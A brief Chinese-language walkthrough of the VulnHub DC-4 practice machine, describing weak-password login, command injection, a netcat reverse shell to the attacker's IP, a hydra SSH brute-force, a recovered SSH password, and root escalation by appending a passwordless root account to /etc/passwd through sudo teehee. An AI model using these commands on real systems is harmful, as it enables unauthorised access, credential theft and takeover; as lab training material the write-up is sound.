下载地址:https://www.vulnhub.com/entry/dc-4,313/
nmap没有扫描到什么有用端口
直接访问80端口
只有一个认证框 没有验证 bp**admin弱密码
发现密码admin qwert
进入后台 发现有执行命令的地方
抓包发现命令由post包传过去
执行的命令由客户端传到了服务端
命令执行获取shell
把nc -e /bin/sh 192.168.49.129 4444传上去
nc –e /bin/sh 192.168.49.129 4444
然后回到kali 监听4444
nc –lvnp 4444
成功返回一个www用户的shell
然后在/home/jim发现了一个备份文件
里面存了密码
去**jim 用户的ssh
hydra –l jim –P jimpw.txt 192.168.49.10 ssh
连进jim
ssh [email protected]
jibril04
发现jim的home里有一封邮件
联想到去看看/etc/mail
发现了另一封邮件
这是charles的密码 直接登录ssh
发现Charles可以执行一条root命令
查看发现teehee可以插入标准化数据
那就在/etc/passwd插一个root用户
echo “aaa::0:0:::/bin/bash” |sudo teehee –a /etc/passwd
然后讲道理 就可以直接su aaa了
Charles su了半天没给进
转换到jim
一下就进去了 玄学吧
欢迎师傅们指点